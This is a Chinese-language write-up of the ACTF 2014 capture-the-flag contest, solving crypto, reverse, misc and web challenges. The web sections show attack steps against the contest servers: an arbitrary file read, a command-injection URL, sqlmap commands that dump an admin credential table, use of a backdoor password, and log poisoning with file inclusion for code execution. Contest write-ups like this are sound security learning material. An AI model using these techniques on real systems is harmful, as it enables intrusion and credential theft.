[CTF]ACTF-2014-L-WriteUp

浙大2014ACTF L. WriteUp

0x00 RE Reverse0

说好的逆向题呢?

出题人还没吃早饭呢,你们急什么。出门左转,乖乖做Web题,OK不?

Flag:OK

0x01 古老 CRYPTO100

本题flag不在ACTF{}中

oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?

替换密码

git clone https://github.com/alexbers/substitution_cipher_solver.git

cd  cd substitution_cipher_solver/

cat "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?" > encrypted.txt

./decrypt.py

Best key: ervglxyzohiqdsnbamfjpwkutc, bad_words 2
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?

FLAG:cryptooosocoolamiright

0x02 餐前甜点 EXPLOIT100

nc 218.2.197.236 2009

crypto200.tar.gz

Le4F

栈溢出,覆盖执行game函数地址

Le4F

0x03 社工 MISC100

听说参加ACTF的屌丝都喜欢上贴吧:)

贴吧,全吧搜索ACTF,发现test帐号发出的Flag,当然,后来做题可能就要苦逼些;-)

Le4F

0x04 Flag之路 Web100

少年,不来一发么。http://218.2.197.236:2005/index.php

打开链接,提示Can you GET the way to flag?

查看源码,发现:

<!--way = "H4ck_F0r_Fun!GoGoGo!" -->

So,http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!

0x05 买不到票的怨念 CRYPTO200

买不到TI4的门票觉得人生好灰暗。。crypto200.tar.gz

参考有过类似题目的CTF,写脚本,解出Key

http://v0ids3curity.blogspot.com/2014/01/hack-you-ctf-2014-crypto-100-easy-one.html

得到的Key:DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo

去掉重复,为DoNotTryToGuessWhatDoesD3AdCa7ThinkOf

解出enc2的明文:

High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}

0x06 杀猪吃肉 EXPLOIT200

nc 218.2.197.236 2010 crypto200.tar.gz

程序拉进IDA里分析,会发现可识别四个指令:

killPig (注意有个空格)

Le4F

如果输入该指令,那么程序首先分配一8字节的内存空间,把地址放在cs:auth中。然后判断killPig 后面字符串的长度是否超过0x1E字节,如果不超过就把killPig 后面8字节字符串内容复制进去,超过就跳过该处理。

reset

Le4F

把cs:auth所存地址free

feedPig

Le4F

新申请一块内存放置feedPig后面字符串,地址放在cs:service里

EatIt

Le4F

很明显是取得key的指令了。但是它前面有个判断,如果cs:auth所存地址+0x20有内容,则回显key,否则跳过。

分析可知要点是让cs:auth所存地址+0x20有内容。

直接killPig +字符串不行,有长度限制。
出题人可能是要先killPig,reset把刚才申请的内存free掉,然后在feedPig重新利用那块地址,输入超过0x20字节的字符串达到目的。

但后来试了下只要killPig后面feedPIg,就会在第一个内存地址+0x20的地方重新分配内存,达到目的;-)

Le4F

0x07 讨厌的管理员 WEB200

FLAG在admin的手里!http://218.2.197.236:2005/web200/index.php

开始题目有Bug,任意用户密码得到返回页面

Le4F

返回Header头,发现Real地址,访问。只有管理员有,修改Cookie,admin=1

Le4F

得到Flag

Le4F

因为题目开始有Bug,起初跑偏,一直把重点放在登陆框的注入上,但是web100.admin表的username和password都没能跑出来数据,后来官方修补此Bug。

0x08 S4ndb0x MISC300

用比较费力的方法枚举,由于时间限制,Burp发包保持32s左右一次的频率,枚举出Flag

int main(int argc, char **argv, char *i)
{
return i=*++argv, i=i+0, *i - 'A';
}

ACTF{c6e49c9b897cc4dba15b39ec53bd8fd681937b8ae16833a24090f27d71d3f8c5}

0x09 喵喵喵喵 WEB300

管理员小陆搭了个服务器,但是好像漏洞蛮多哟。

http://218.2.197.236:2001/index.html

起初没发现什么信息,后来在About终于看到一个小小的:

This doubi web blog layout is provided by ./bc

访问bc目录,某链接存在任意文件读取,但过滤了..

<?php
$url=$_GET['uuu']; 
$url=str_replace("..","",$url); 
$file = fopen("$url", "r") or exit("Unable to open file!"); 
//Output a line of the file until the end is reached 
while(!feof($file)) { 
echo fgets($file)."
"; 
} 
fclose($file); 
?> 

读/etc/passwd发现HINT:x:500:500::/usr/share/ngInx/html:/bin/bash,得以读取网站目录login.php

Le4F

login.php存在类似SRUN3000命令执行,?gongwan=1|ls > /tmp/x,列出目录

Le4F

读取DBINFO得到flag

<?php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long 
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session 
$dbhost = "localhost"; 
$dbname = "FLAG"; // mysql database name 
$dbuser = "FLAG"; // mysql database username 
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password 
$pre = "onecms_"; // prefix for onecms tables 
?> 

0x0A 老大哥aay的秘密 CRYPTO400

老大哥aay给了你一个神秘文件,你看着办吧flag.rar

一个加密的RAR文件,能看到每个文件大小为5,且有CRC值

Le4F

将ACTF{保存为1.txt后加密压缩,发现CRC相同,确定思路,暴力枚举CRC

#include <windows.h>
#include <stdio.h>
//crc32.h
#ifndef _CRC32_H
#define _CRC32_H

UINT crc32( UCHAR *buf, int len);

#endif

static UINT   CRC32[256];
static char   init = 0;

//初始化表
static void init_table()
{
    int   i,j;
    UINT   crc;
    for(i = 0;i < 256;i++)
    {
     crc = i;
    for(j = 0;j < 8;j++)
    {
        if(crc & 1)
        {
             crc = (crc >> 1) ^ 0xEDB88320;
        }
        else
        {
             crc = crc >> 1;
        }
    }
     CRC32[i] = crc;
    }
}

//crc32实现函数
UINT crc32( UCHAR *buf, int len)
{
    UINT ret = 0xFFFFFFFF;
    int   i;
    if( !init )
    {
     init_table();
     init = 1;
    }
    for(i = 0; i < len;i++)
    {
     ret = CRC32[((ret & 0xFF) ^ buf[i])] ^ (ret >> 8);
    }
     ret = ~ret;
    return ret;
}

int main()
{
    char ss[]="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
    char sss[6]={0};
    int a,b,c,d,e;

    int _crc32 = 0;

    for(a=0; a<strlen(ss); a++)
    {
        for(b=0; b<strlen(ss); b++)
        {
            for(c=0; c<strlen(ss); c++)
            {
                for(d=0; d<strlen(ss); d++)
                {
                    for(e=0; e<strlen(ss); e++)
                    {
                        sss[0] = ss[a];
                        sss[1] = ss[b];
                        sss[2] = ss[c];
                        sss[3] = ss[d];
                        sss[4] = ss[e];

                        _crc32 = crc32((UCHAR *)sss, 5);

                        if(_crc32 == 0xCA2AA4DE)
                        {
                            printf("%s\n", sss);
                            system("PAUSE");
                        }
                    }
                }
            }
        }
    }

    return 0;
}

CRC存在碰撞,好在根据语意可确定最后Flag

0x0B 赞助商 MISC400

你大家快来看赞助商!hidden.png

下载图片后ps处理下,二维码的形状已经很清晰了,对比官网图片,除却二维码像素相同,python对比生成二维码

Le4F

二维码为Version3 29*29,二维码三角即可,但此图片右下角仍缺少一行一列,有2^17种可能

当时真的生成了这17w二维码文件并使用脚本批量扫描,由于脚本的原因没有得到扫描结果,在此过程中学习二维码结构

结构参考:http://en.wikipedia.org/wiki/QR_code

右下角有一个位置确认标志,不影响扫描数据,可设置为黑(1),排除9点,剩下2^8即256种可能,批量生成:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import string
from PIL import Image

def showQRCode(fpath,bit,a):
    bmp = Image.open(fpath)
    bmp2 = Image.open('logo.jpg')
    pix = bmp.load()
    pix2 = bmp2.load()
    w, h = bmp.size
    w2, h2 = bmp2.size
    i=0
    for x in xrange(0, w):
        for y in xrange(0, h):
            if pix[x,y] == pix2[x,y]:
                pix[x,y] = (255,255,255)
            else:
                pix[x,y] = (0,0,0)
            if (x ==21 and y>=21 and y<=25) or (x>=21 and x<=25 and y==21 ):
                    pix[x, y] = (0, 0, 0)
            if (x ==21 and y>=26 and y<=29) or (x>=26 and x<=29 and y==21 ):
                if int(bit[i])==0:
                    pix[x, y] = (255, 255, 255)
                else:
                    pix[x, y] = (0, 0, 0)
                i+=1
    bmp.save('test'+a+'.png')

if __name__ == "__main__":
    for a in open('passdic.list','rU'):
        a=a.rstrip()
        flagHex = showQRCode("hidden.png",a,a)

后批量识别又没有收获,此时也是凌晨,就拿起SmartPhone无力的挨个扫,一遍过去,没结果,又来一遍,终于在肌无力时扫了出来!如果直接测试找个可靠的识别脚本批量处理会更好。

识别的文件为test11010100

Le4F

0x0C 贡丸酱 WEB400

web300没做出来的话这题做出来的希望不大,你以为你是可爱的贡丸酱么( つ•̀ω•́)つ

(贡丸酱到底算不算提示呢)

(web300和web400都不需要使用扫描器)

(本题flag并不是ACTF形式的,你提交的flag中也不需要包含任何形式的括号)

http://218.2.197.236:2003

现在可以公开的情报:

管理员是个很懒的人,他的笔记几乎没有任何废话。

根据提示,通过web300的命令执行&文件读取发现这样的笔记

Le4F

访问Web400此地址

Le4F

根据笔记信息基本可以存在injection,根据这页面的样子又一次跑偏到Mangodb上,经过艰苦的过程终于想到那个Base4不是告诉我们gw,而是提示注入!--

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 -D raw_admin -T admin --dump

Database: raw_admin
Table: admin
[3 entries]
+--------------------+-----------------+
| login              | password        |
+--------------------+-----------------+
| gw                 | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288       |
| luyuhaoxiaodaibi   | luyuhaodadaibi  |
+--------------------+-----------------+

跑出这些信息,知906239288为笔记中的女神。

百度发现http://www.baidu.com/p/%E8%92%B2%E8%91%B5%E9%A6%99%E7%AF%86301?from=zhidao,无甚收获

微博有信息

Le4F

故,后门:http://218.2.197.236:2003/Fuckingluyuhao.php 密码wangbiyun

alias后门,可能放到/var/tmp/下

Le4F

得到Flag

0x0D 丧心病狂的黑客 WEB500

管理员小陆搭的服务器被人日穿了(见web300),小陆被boss骂了个狗血淋头。然后boss勒令小陆再搭一遍,小陆在某内网换了个架构(原架构是nginx)又搭了一遍web300的站,修补了部分漏洞。boss和小陆都是那台服务器的用户,这样boss发现小陆又写出漏洞代码就会及时记录在服务器上。

接受挑战,hackers,日穿这台位置未知的内网服务器!!!

(本题和之前的web题有紧密联系!!!)

(部分关键文件每十分钟重置一次!!!)

(本题flag不包含有ACTF字样,不包含有任何括号!!!)

(Drink All The Booze , Hack All The Things!!!)

第一步先确定服务器位置

根据提示,可以猜到和WEB300有关

依靠WEB300漏洞,整理WEB300服务器信息如下

Linux gamebox 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux 


eth0 Link encap:Ethernet HWaddr 00:0C:29:7A:61:32 
inet addr:172.17.1.2 Bcast:172.17.1.7 Mask:255.255.255.248 
inet6 addr: fe80::20c:29ff:fe7a:6132/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:8322561 errors:0 dropped:0 overruns:0 frame:0 
TX packets:7889370 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:969748319 (924.8 MiB) TX bytes:9273711147 (8.6 GiB) 

lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:16436 Metric:1 
RX packets:13053905 errors:0 dropped:0 overruns:0 frame:0 
TX packets:13053905 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:41653303424 (38.7 GiB) TX bytes:41653303424 (38.7 GiB) 


Active Internet connections (only servers) 
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2130/nginx 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:55129 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 515/php-fpm 
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - 
tcp 0 0 :::51855 :::* LISTEN - 
tcp 0 0 :::111 :::* LISTEN - 
tcp 0 0 :::22 :::* LISTEN - 
tcp 0 0 ::1:631 :::* LISTEN - 
tcp 0 0 ::1:25 :::* LISTEN - 
udp 0 0 0.0.0.0:111 0.0.0.0:* - 
udp 0 0 0.0.0.0:631 0.0.0.0:* - 
udp 0 0 0.0.0.0:636 0.0.0.0:* - 
udp 0 0 0.0.0.0:895 0.0.0.0:* - 
udp 0 0 0.0.0.0:45324 0.0.0.0:* - 
udp 0 0 0.0.0.0:914 0.0.0.0:* - 
udp 0 0 0.0.0.0:68 0.0.0.0:* - 
udp 0 0 :::111 :::* - 
udp 0 0 :::37369 :::* - 
udp 0 0 :::895 :::* - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 1080 0.0.0.0:1 0.0.0.0:* 7 - 
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 - 
Active UNIX domain sockets (only servers) 
Proto RefCnt Flags Type State I-Node PID/Program name Path 
unix 2 [ ACC ] STREAM LISTENING 11013 - @/var/run/hald/dbus-J7oPQkOOJW 
unix 2 [ ACC ] STREAM LISTENING 10583 - /var/run/rpcbind.sock 
unix 2 [ ACC ] STREAM LISTENING 7281 - @/com/ubuntu/upstart 
unix 2 [ ACC ] STREAM LISTENING 10856 - /var/run/dbus/system_bus_socket 
unix 2 [ ACC ] STREAM LISTENING 10917 - /var/run/cups/cups.sock 
unix 2 [ ACC ] STREAM LISTENING 10977 - /var/run/acpid.socket 
unix 2 [ ACC ] STREAM LISTENING 12567 - public/cleanup 
unix 2 [ ACC ] STREAM LISTENING 11008 - @/var/run/hald/dbus-6ghIWFnai8 
unix 2 [ ACC ] STREAM LISTENING 12574 - private/tlsmgr 
unix 2 [ ACC ] STREAM LISTENING 12578 - private/rewrite 
unix 2 [ ACC ] STREAM LISTENING 12582 - private/bounce 
unix 2 [ ACC ] STREAM LISTENING 12586 - private/defer 
unix 2 [ ACC ] STREAM LISTENING 12590 - private/trace 
unix 2 [ ACC ] STREAM LISTENING 12594 - private/verify 
unix 2 [ ACC ] STREAM LISTENING 12598 - public/flush 
unix 2 [ ACC ] STREAM LISTENING 12602 - private/proxymap 
unix 2 [ ACC ] STREAM LISTENING 12606 - private/proxywrite 
unix 2 [ ACC ] STREAM LISTENING 12610 - private/smtp 
unix 2 [ ACC ] STREAM LISTENING 12614 - private/relay 
unix 2 [ ACC ] STREAM LISTENING 12618 - public/showq 
unix 2 [ ACC ] STREAM LISTENING 12622 - private/error 
unix 2 [ ACC ] STREAM LISTENING 12626 - private/retry 
unix 2 [ ACC ] STREAM LISTENING 12630 - private/discard 
unix 2 [ ACC ] STREAM LISTENING 12634 - private/local 
unix 2 [ ACC ] STREAM LISTENING 12638 - private/virtual 
unix 2 [ ACC ] STREAM LISTENING 12642 - private/lmtp 
unix 2 [ ACC ] STREAM LISTENING 12646 - private/anvil 
unix 2 [ ACC ] STREAM LISTENING 12650 - private/scache 
unix 2 [ ACC ] STREAM LISTENING 12346 - /var/lib/mysql/mysql.sock 
unix 2 [ ACC ] STREAM LISTENING 12725 - /var/run/abrt/abrt.socket 

root pts/2 zhutou-centos-1- Sun Apr 6 01:34 - 01:34 (00:00) 
root pts/1 222.205.110.239 Sat Apr 5 12:53 still logged in 
root pts/1 222.205.110.239 Sat Apr 5 12:12 - 12:13 (00:01) 
root pts/1 222.205.110.239 Sat Apr 5 12:09 - 12:11 (00:01) 
root pts/0 zhutou-centos-1- Sat Apr 5 12:07 - 17:16 (05:08) 
root pts/0 222.205.110.239 Sat Apr 5 10:07 - 10:08 (00:01) 
reboot system boot 2.6.32-431.el6.x Sat Apr 5 09:36 - 02:19 (16:42) 


ARP -e
Address HWtype HWaddress Flags Mask Iface 
zhutou-centos-1-gw ether 00:0c:29:03:c2:e2 C eth0 
zhutou-centos-2 ether 00:0c:29:b6:4e:b8 C eth0 
172.17.1.5 (incomplete) eth0 


Kernel IP routing table 
Destination Gateway Genmask Flags Metric Ref Use Iface 
172.17.1.0 * 255.255.255.248 U 0 0 0 eth0 
link-local * 255.255.0.0 U 1002 0 0 eth0 
default zhutou-centos-1 0.0.0.0 UG 0 0 0 eth0 

基本可确定zhutou-centos-2就是目标机器,ping -c 4 zhutou-centos-2 得到ip为172.17.1.3

PING zhutou-centos-2 (172.17.1.3) 56(84) bytes of data. 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=1 ttl=64 time=0.153 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=2 ttl=64 time=0.166 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=3 ttl=64 time=0.192 ms 
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=4 ttl=64 time=0.170 ms 

通过curl命令访问172.17.1.3上的任意文件读取,漏洞依然存在,但命令执行已被删除。做此题时相对较晚,重定向到/tmp目录的临时文件总被脚本删除,浪费了些许时间。

因架构换为Apache,继续收集信息

查看access.log历史记录,提取出fuckti0n.php请求,读取文件内容

<?php   
if ($_GET[page]) {
include $_GET[page];
} else {
include "home.php";
}
?>

一个任意文件包含,看看php.ini

disable_functions = 
allow_url_fopen = On 
allow_url_include = Off 

不能远程包含文件。查看/etc/passwd,多了一行

boss:x:500:500::/var/www/boss:/bin/bash 

可以猜到flag应该在boss目录下,但需要命令执行才能ls到,此时可影响的文件只有日志,故借助日志构造命令执行并由fuckti0n.php包含执行

Le4F

列出目录后读取文件内容

Le4F

Le4F

CX是何方女神,fxxk`

其他题目未能解出,坐等WannaBe

{ACTF WriteUp By L. @XDSEC.ORG}

Comments
Write a Comment